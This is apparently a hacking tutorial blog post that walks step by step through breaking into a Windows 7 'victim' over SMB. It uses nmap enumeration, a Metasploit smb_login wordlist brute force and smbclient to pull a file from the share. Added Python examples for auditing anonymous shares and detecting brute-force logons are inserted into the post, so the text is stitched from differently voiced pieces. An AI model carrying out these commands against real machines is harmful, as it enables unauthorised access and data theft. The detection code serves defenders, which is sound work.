Exploit Samba "SmbClient"
Like FTP (File Transfer Protocol), Samba covers things like getting files from the server to the local machine, putting files from the local machine onto the server, retrieving directory listings from the server, and so on.
In this case the victim has to have shared folders or files enabled.
Equipment:
1. SmbClient
2. Nmap
3. Metasploit
The first step: scan the victim's IP address for open ports using Nmap.
The port we need here is port 445 (microsoft-ds).
# nmap (Victim Ip-Address)
As seen in the picture above, I am lucky :)
Now let us look at what is behind that port.
# nmap -p445 --script=smb-os-discovery (Victim Ip-Address)
--script=smb-os-discovery : Attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol (ports 445 or 139).
As seen in the picture above, it turns out the victim is running Windows 7 Ultimate.
The computer name and NetBIOS name is ANONYMOUS-PC.
Now, see the documentation for the Nmap smb script library.
# nmap -p445 --script=smb-enum-shares (Victim Ip-Address)
As seen above, the victim has a shared folder =))
It seems this exploitation will work =))
Now, run SmbClient.
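The share listing above is the point where a defender would want a repeatable check rather than a screenshot. The script below is an added example, not part of the original post: it parses the XML that `nmap -oX` writes for the smb-enum-shares script and reports every share an unauthenticated client can reach. The XML sample is constructed for this example (the host address, share names and access values are made up), and it assumes the script's per-share fields are emitted as `<table>`/`<elem>` pairs keyed "Anonymous access" and "Current user access", as in the text output.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape nmap -oX produces for smb-enum-shares:
# one <table> per share with <elem> children. All values are invented.
SAMPLE_NMAP_XML = r"""<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-enum-shares" output="(omitted)">
        <elem key="account_used">guest</elem>
        <table key="\\192.0.2.10\ADMIN$">
          <elem key="Type">STYPE_DISKTREE_HIDDEN</elem>
          <elem key="Comment">Remote Admin</elem>
          <elem key="Anonymous access">&lt;none&gt;</elem>
          <elem key="Current user access">&lt;none&gt;</elem>
        </table>
        <table key="\\192.0.2.10\IPC$">
          <elem key="Type">STYPE_IPC_HIDDEN</elem>
          <elem key="Comment">Remote IPC</elem>
          <elem key="Anonymous access">READ</elem>
          <elem key="Current user access">READ</elem>
        </table>
        <table key="\\192.0.2.10\Smb-Shares">
          <elem key="Type">STYPE_DISKTREE</elem>
          <elem key="Comment"></elem>
          <elem key="Anonymous access">READ/WRITE</elem>
          <elem key="Current user access">READ/WRITE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def audit_shares(xml_text):
    """Return (host, share, anonymous_access, severity) for every share that
    an unauthenticated client can reach.

    IPC$ being readable anonymously is the normal Windows baseline, so it is
    reported as 'info'; any other anonymously reachable share is 'high'.
    Shares whose anonymous access is '<none>' are not reported.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for script in host.iter("script"):
            if script.get("id") != "smb-enum-shares":
                continue
            for table in script.findall("table"):
                # table key looks like \\192.0.2.10\ShareName; keep the share part
                share = table.get("key").rsplit("\\", 1)[-1]
                fields = {e.get("key"): (e.text or "") for e in table.findall("elem")}
                anon = fields.get("Anonymous access", "<none>")
                if anon == "<none>":
                    continue
                severity = "info" if share.upper() == "IPC$" else "high"
                findings.append((addr, share, anon, severity))
    return findings


if __name__ == "__main__":
    for addr, share, anon, severity in audit_shares(SAMPLE_NMAP_XML):
        print(f"[{severity}] \\\\{addr}\\{share}: anonymous access = {anon}")
```

Run it against a real `nmap -p445 --script=smb-enum-shares -oX shares.xml` file by reading the file into `audit_shares`; a "high" finding means the share is reachable without any password at all, which is the condition the post relies on.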
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p 445
Damn >_<, we are prompted for a password. How do we get the password? It would be impossible to succeed by guessing the victim's password by hand.
I will not give up; let's proceed with Metasploit ^_^
# msfconsole
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary (smb_login) > set RHOSTS Victim Ip-Address (Range)
msf auxiliary (smb_login) > set PASS_FILE /Path/Your/Password_wordlist/*.txt
msf auxiliary (smb_login) > set USER_FILE /Path/Your/Username_wordlist/*.txt
msf auxiliary (smb_login) > run
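What the smb_login module does from the attacker's side shows up on the Windows host as a burst of failed network logons (Security event 4625, logon type 3) from one source, followed by a success (event 4624) if a wordlist entry matches. The detector below is an added example, not part of the original post or of Metasploit: it runs over constructed log lines in a simplified one-line-per-event format (not the real Windows event text) and raises an alert when one source crosses a failure threshold inside a time window, and again when that source later succeeds.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed line format for this example; a real pipeline would map the
# fields from the Windows Security log (EventID, Logon Type, Target User,
# Source Network Address) into the same shape.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUser=(?P<user>\S+) SourceIP=(?P<ip>\S+)$"
)

# Constructed sample: a wordlist run from 192.0.2.55 against one account,
# ending in a successful logon, plus a user at 192.0.2.77 who mistyped twice
# and an interactive (LogonType=2) failure that is not an SMB logon at all.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:02Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:03Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:04Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:05Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:06Z EventID=4625 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:00:07Z EventID=4624 LogonType=3 TargetUser=ANONYMOUS-PC SourceIP=192.0.2.55
2024-05-01T10:05:00Z EventID=4625 LogonType=3 TargetUser=alice SourceIP=192.0.2.77
2024-05-01T10:09:00Z EventID=4625 LogonType=3 TargetUser=alice SourceIP=192.0.2.77
2024-05-01T10:10:00Z EventID=4625 LogonType=2 TargetUser=bob SourceIP=127.0.0.1
"""


def detect_smb_bruteforce(log_text, window=timedelta(seconds=60), threshold=5):
    """Return a list of alert dicts.

    Only network logons (LogonType 3) are considered, because that is how
    SMB authentication is recorded. An alert fires when a source reaches
    `threshold` failures inside `window`; the alert type distinguishes many
    passwords against one user ("brute force") from one password against
    many users ("password spraying"). A later 4624 from a source that
    already produced at least `threshold` failures fires a second alert,
    since that is the moment a wordlist entry worked.
    """
    recent = defaultdict(deque)   # source ip -> deque of (timestamp, user)
    total_failures = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["lt"] != "3":
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ip, user, eid = m["ip"], m["user"], m["eid"]
        q = recent[ip]
        while q and ts - q[0][0] > window:      # drop failures outside the window
            q.popleft()
        if eid == "4625":
            q.append((ts, user))
            total_failures[ip] += 1
            if len(q) == threshold:             # fire once, when the line is crossed
                users = {u for _, u in q}
                alerts.append({
                    "type": "password spraying" if len(users) > 1 else "brute force",
                    "source": ip, "failures": len(q),
                    "users": sorted(users), "time": m["ts"],
                })
        elif eid == "4624" and total_failures[ip] >= threshold:
            alerts.append({
                "type": "success after failures", "source": ip,
                "failures": total_failures[ip], "users": [user], "time": m["ts"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert type is the one worth paging on: five failures may be a scripted service with a stale password, but a success right after a failure burst from the same address is the signature of a guessed credential and the account should be treated as compromised until proven otherwise.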
Yeah, I succeeded in getting the password :)
Now we go back and log in to get the list of shares available on the host.
# smbclient -L (Victim Ip-Address) -U (Computer Name) -p 445
^_^
Now we try to access the C drive on the victim's computer.
# smbclient //Victim Ip-Address/C -U (Computer Name) -p 445
Failed??? Status: bad network name (NT_STATUS_BAD_NETWORK_NAME).
Try to access the existing Smb-Shares share on the victim's computer instead.
# smbclient //Victim Ip-Address/Smb-Shares -U (Computer Name) -p 445
Success :)
Then I download a file that is in the folder.
smb: \> get Smb-Shared-file.txt
And the result is
Regards
Hidemichi-Hiroyuki a.k.a [H2]
Must have a wordlist, right?
Wordlist, oh wordlist, I'm at my laziest when I have to brute force.
This brute force dude ;)